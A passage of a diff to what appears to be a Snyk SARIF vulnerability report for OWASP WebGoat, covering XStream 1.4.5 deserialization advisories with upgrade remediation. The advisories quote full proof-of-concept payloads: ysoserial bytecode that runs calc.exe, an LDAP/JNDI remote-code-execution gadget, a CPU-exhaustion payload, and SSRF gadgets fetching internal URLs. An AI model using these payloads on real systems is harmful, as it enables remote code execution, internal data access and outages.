aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>\r\n                      <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>\r\n                    </__bytecodes>\r\n                    <__transletIndex>-1</__transletIndex>\r\n                    <__indentNumber>0</__indentNumber>\r\n                  </default>\r\n                </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>\r\n              </proxy>\r\n              <implementing__method>\r\n                <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>\r\n                <name>getOutputProperties</name>\r\n                <parameter-types/>\r\n              </implementing__method>\r\n            </sun.tracing.dtrace.DTraceProbe>\r\n          </entry>\r\n        </probes>\r\n      </defaultHandler>\r\n    </handler>\r\n  </dynamic-proxy>\r\n</linked-hash-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x)\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39149.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -794,14 +490,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &#x3C;none&#x3E;</m__obj>\r\n      </value>\r\n    </javax.naming.ldap.Rdn_-RdnEntry>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n          <parsedMessage>true</parsedMessage>\r\n          <soapVersion>SOAP_11</soapVersion>\r\n          <bodyParts/>\r\n          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n            <attachmentsInitialized>false</attachmentsInitialized>\r\n            <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n              <soapPart/>\r\n              <mm>\r\n                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                  <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>\r\n                    <homeCtx>\r\n                      <hostname>233.233.233.233</hostname>\r\n                      <port__number>2333</port__number>\r\n                      <clnt class='com.sun.jndi.ldap.LdapClient'/>\r\n                    </homeCtx>\r\n                    <hasMoreCalled>true</hasMoreCalled>\r\n                    <more>true</more>\r\n                    <posn>0</posn>\r\n                    <limit>1</limit>\r\n                    <entries>\r\n                      <com.sun.jndi.ldap.LdapEntry>\r\n                        <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>\r\n                        <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>\r\n                          <javax.naming.directory.BasicAttribute>\r\n                            <default>\r\n                              <ignoreCase>false</ignoreCase>\r\n                            </default>\r\n                            <int>4</int>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                                  <attrID>objectClass</attrID>\r\n                                </default>\r\n                                <int>1</int>\r\n                                <string>javanamingreference</string>\r\n                              </javax.naming.directory.BasicAttribute>\r\n                            </javax.naming.directory.BasicAttribute>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                                  <attrID>javaCodeBase</attrID>\r\n                                </default>\r\n                                <int>1</int>\r\n                                <string>http://127.0.0.1:2333/</string>\r\n                              </javax.naming.directory.BasicAttribute>\r\n                            </javax.naming.directory.BasicAttribute>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                                  <attrID>javaClassName</attrID>\r\n                                </default>\r\n                                <int>1</int>\r\n                                <string>refClassName</string>\r\n                              </javax.naming.directory.BasicAttribute>\r\n                            </javax.naming.directory.BasicAttribute>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                       "
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.org.apache.xpath.internal.objects.XString'>\r\n        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &#x3C;none&#x3E;</m__obj>\r\n      </value>\r\n    </javax.naming.ldap.Rdn_-RdnEntry>\r\n    <javax.naming.ldap.Rdn_-RdnEntry>\r\n      <type>12345</type>\r\n      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>\r\n        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>\r\n          <parsedMessage>true</parsedMessage>\r\n          <soapVersion>SOAP_11</soapVersion>\r\n          <bodyParts/>\r\n          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>\r\n            <attachmentsInitialized>false</attachmentsInitialized>\r\n            <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>\r\n              <soapPart/>\r\n              <mm>\r\n                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>\r\n                  <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>\r\n                    <homeCtx>\r\n                      <hostname>233.233.233.233</hostname>\r\n                      <port__number>2333</port__number>\r\n                      <clnt class='com.sun.jndi.ldap.LdapClient'/>\r\n                    </homeCtx>\r\n                    <hasMoreCalled>true</hasMoreCalled>\r\n                    <more>true</more>\r\n                    <posn>0</posn>\r\n                    <limit>1</limit>\r\n                    <entries>\r\n                      <com.sun.jndi.ldap.LdapEntry>\r\n                        <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>\r\n                        <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>\r\n                          <javax.naming.directory.BasicAttribute>\r\n                            <default>\r\n                              <ignoreCase>false</ignoreCase>\r\n                            </default>\r\n                            <int>4</int>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                                  <attrID>objectClass</attrID>\r\n                                </default>\r\n                                <int>1</int>\r\n                                <string>javanamingreference</string>\r\n                              </javax.naming.directory.BasicAttribute>\r\n                            </javax.naming.directory.BasicAttribute>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                                  <attrID>javaCodeBase</attrID>\r\n                                </default>\r\n                                <int>1</int>\r\n                                <string>http://127.0.0.1:2333/</string>\r\n                              </javax.naming.directory.BasicAttribute>\r\n                            </javax.naming.directory.BasicAttribute>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                                  <attrID>javaClassName</attrID>\r\n                                </default>\r\n                                <int>1</int>\r\n                                <string>refClassName</string>\r\n                              </javax.naming.directory.BasicAttribute>\r\n                            </javax.naming.directory.BasicAttribute>\r\n                            <javax.naming.directory.BasicAttribute serialization='custom'>\r\n                              <javax.naming.directory.BasicAttribute>\r\n                                <default>\r\n                                  <ordered>false</ordered>\r\n                                  <attrID>javaFactory</attrID>\r\n                                </default>\r\n                                <int>1</int>\r\n                                <string>Evil</string>\r\n                              </javax.naming.directory.BasicAttribute>\r\n                            </javax.naming.directory.BasicAttribute>\r\n                          </javax.naming.directory.BasicAttribute>\r\n                        </attributes>\r\n                      </com.sun.jndi.ldap.LdapEntry>\r\n                    </entries>\r\n                  </aliases>\r\n                </it>\r\n              </mm>\r\n            </multiPart>\r\n          </sm>\r\n        </message>\r\n      </value>\r\n    </javax.naming.ldap.Rdn_-RdnEntry>\r\n  </java.util.PriorityQueue>\r\n</java.util.PriorityQueue>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39145.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-434",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-434", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -816,14 +508,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<linked-hash-set>\r\n  <sun.reflect.annotation.AnnotationInvocationHandler serialization='custom'>\r\n    <sun.reflect.annotation.AnnotationInvocationHandler>\r\n      <default>\r\n        <memberValues class='javax.script.SimpleBindings'>\r\n          <map class='javax.script.SimpleBindings' reference='..'/>\r\n        </memberValues>\r\n        <type>javax.xml.transform.Templates</type>\r\n      </default>\r\n    </sun.reflect.annotation.AnnotationInvocationHandler>\r\n  </sun.reflect.annotation.AnnotationInvocationHandler>\r\n</linked-hash-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39140.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n## PoC\r\n\r\n```\r\n<linked-hash-set>\r\n  <sun.reflect.annotation.AnnotationInvocationHandler serialization='custom'>\r\n    <sun.reflect.annotation.AnnotationInvocationHandler>\r\n      <default>\r\n        <memberValues class='javax.script.SimpleBindings'>\r\n          <map class='javax.script.SimpleBindings' reference='..'/>\r\n        </memberValues>\r\n        <type>javax.xml.transform.Templates</type>\r\n      </default>\r\n    </sun.reflect.annotation.AnnotationInvocationHandler>\r\n  </sun.reflect.annotation.AnnotationInvocationHandler>\r\n</linked-hash-set>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39140.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 6.5,
                 "security-severity": "6.5"
               }
@@ -838,14 +526,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n## PoC\r\n\r\n```\r\n<map>\r\n  <entry>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData>\r\n      <url>http://localhost:8080/internal/</url>\r\n      <cs>GBK</cs>\r\n      <hash>1111</hash>\r\n      <array>b</array>\r\n      <length>0</length>\r\n      <lastModified>0</lastModified>\r\n    </jdk.nashorn.internal.runtime.Source_-URLData>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\r\n  </entry>\r\n  <entry>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData>\r\n      <url>http://localhost:8080/internal/</url>\r\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\r\n      <hash>1111</hash>\r\n      <array>b</array>\r\n      <length>0</length>\r\n      <lastModified>0</lastModified>\r\n    </jdk.nashorn.internal.runtime.Source_-URLData>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\r\n  </entry>\r\n</map>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39152.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39152.yaml)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n## PoC\r\n\r\n```\r\n<map>\r\n  <entry>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData>\r\n      <url>http://localhost:8080/internal/</url>\r\n      <cs>GBK</cs>\r\n      <hash>1111</hash>\r\n      <array>b</array>\r\n      <length>0</length>\r\n      <lastModified>0</lastModified>\r\n    </jdk.nashorn.internal.runtime.Source_-URLData>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\r\n  </entry>\r\n  <entry>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData>\r\n      <url>http://localhost:8080/internal/</url>\r\n      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>\r\n      <hash>1111</hash>\r\n      <array>b</array>\r\n      <length>0</length>\r\n      <lastModified>0</lastModified>\r\n    </jdk.nashorn.internal.runtime.Source_-URLData>\r\n    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>\r\n  </entry>\r\n</map>\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n# Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n# References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39152.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n- [Nuclei Templates](https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39152.yaml)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-502",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-502", "maven"],
                 "cvssv3_baseScore": 8.5,
                 "security-severity": "8.5"
               }
@@ -860,14 +544,10 @@
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <dynamic-proxy>\r\n      <interface>java.lang.Comparable</interface>\r\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\r\n        <owner/>\r\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\r\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\r\n          <stubHandlers>\r\n            <entry>\r\n              <method>\r\n                <class>java.lang.Comparable</class>\r\n                <name>compareTo</name>\r\n                <parameter-types>\r\n                  <class>java.lang.Object</class>\r\n                </parameter-types>\r\n              </method>\r\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\r\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\r\n                  <indices>\r\n                    <int>0</int>\r\n                  </indices>\r\n                  <getters>\r\n                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>\r\n                  </getters>\r\n                  <accessors>\r\n                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>\r\n                      <val_-isJAXBElement>false</val_-isJAXBElement>\r\n                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>\r\n                        <type>int</type>\r\n                        <field>\r\n                          <name>hash</name>\r\n                          <clazz>java.lang.String</clazz>\r\n                        </field>\r\n                      </val_-getter>\r\n                      <val_-isListType>false</val_-isListType>\r\n                      <val_-n>\r\n                        <namespaceURI/>\r\n                        <localPart>hash</localPart>\r\n                        <prefix/>\r\n                      </val_-n>\r\n                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>\r\n                        <type>java.lang.String</type>\r\n                        <method>\r\n                          <class>jdk.nashorn.internal.runtime.Source</class>\r\n                          <name>readFully</name>\r\n                          <parameter-types>\r\n                            <class>java.net.URL</class>\r\n                          </parameter-types>\r\n                        </method>\r\n                      </val_-setter>\r\n                      <outer-class>\r\n                        <propertySetters>\r\n                          <entry>\r\n                            <string>serialPersistentFields</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>[Ljava.io.ObjectStreamField;</type>\r\n                              <field>\r\n                                <name>serialPersistentFields</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>CASE_INSENSITIVE_ORDER</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>java.util.Comparator</type>\r\n                              <field>\r\n                                <name>CASE_INSENSITIVE_ORDER</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>serialVersionUID</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>long</type>\r\n                              <field>\r\n                                <name>serialVersionUID</name>\r\n                                <clazz>java.lang.String</clazz>\r\n                              </field>\r\n                            </com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                          </entry>\r\n                          <entry>\r\n                            <string>value</string>\r\n                            <com.sun.xml.internal.ws.spi.db.FieldSetter>\r\n                              <type>[C</type>\r\n                       "
+                "markdown": "* Package Manager: maven\n* Vulnerable module: com.thoughtworks.xstream:xstream\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT and com.thoughtworks.xstream:xstream@1.4.5\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › com.thoughtworks.xstream:xstream@1.4.5\n# Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n## PoC\r\n\r\n```\r\n<java.util.PriorityQueue serialization='custom'>\r\n  <unserializable-parents/>\r\n  <java.util.PriorityQueue>\r\n    <default>\r\n      <size>2</size>\r\n    </default>\r\n    <int>3</int>\r\n    <dynamic-proxy>\r\n      <interface>java.lang.Comparable</interface>\r\n      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>\r\n        <owner/>\r\n        <managedObjectManagerClosed>false</managedObjectManagerClosed>\r\n        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>\r\n          <stubHandlers>\r\n            <entry>\r\n              <method>\r\n                <class>java.lang.Comparable</class>\r\n                <name>compareTo</name>\r\n                <parameter-types>\r\n                  <class>java.lang.Object</class>\r\n                </parameter-types>\r\n              </method>\r\n              <com.sun.xml.internal.ws.client.sei.StubHandler>\r\n                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>\r\n                  <indices>\r\n                    <int>0</int>\r\n                 